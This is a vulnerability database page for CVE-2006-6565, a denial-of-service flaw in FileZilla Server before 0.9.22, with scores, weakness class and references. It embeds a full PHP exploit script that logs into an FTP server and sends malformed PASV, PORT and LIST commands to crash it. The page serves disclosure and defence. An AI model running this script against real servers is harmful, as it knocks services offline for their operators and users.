CVE-2006-6565 : Detail

CVE-2006-6565

Memory Corruption
9.71%V3
Network
2006-12-15
10h00 +00:00
2017-10-18
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

FileZilla Server before 0.9.22 allows remote attackers to cause a denial of service (crash) via a wildcard argument to the (1) LIST or (2) NLST commands, which results in a NULL pointer dereference, a different set of vectors than CVE-2006-6564. NOTE: CVE analysis suggests that the problem might be due to a malformed PORT command.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-476 NULL Pointer Dereference
The product dereferences a pointer that it expects to be valid but is NULL.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 2914

Publication date : 2006-12-10 23h00 +00:00
Author : shinnai
EDB Verified : Yes

<?php # Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service # by shinnai # mail: shinnai[at]autistici[dot[org] # site: http://shinnai.altervista.org # # special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html # and for code in php I never could write alone ;) # This one works fine also with an user with only read and list permissions enabled # you can change the LIST command also with NLST or NLST -al comamnds # tested on Windows XP Professional SP2 all patched error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname('127.0.0.1'); $user="test"; $pass="test"; $junk.="A*"; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; } else { echo "OK.\n"; } $result = socket_connect($socket, $address, $service_port); if ($result < 0) { echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; } else { echo "OK.\n"; } $out=socket_read($socket, 240); echo $out; $in = "USER ".$user."\r\n"; socket_write($socket, $in, strlen ($in)); $out=socket_read($socket, 80); echo $out; $in = "PASS ".$pass."\r\n"; socket_write($socket, $in, strlen ($in)); $out=socket_read($socket, 80); echo $out; $in = "PASV ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); $in = "PORT ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); $in = "LIST ".$junk."\r\n"; socket_write($socket, $in, strlen ($in)); socket_close($socket); ?> # milw0rm.com [2006-12-11]

Products Mentioned

Configuraton 0

Filezilla-project>>Filezilla_server >> Version To (excluding) 0.9.22

References

https://www.exploit-db.com/exploits/2914
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2006/4937
Tags : vdb-entry, x_refsource_VUPEN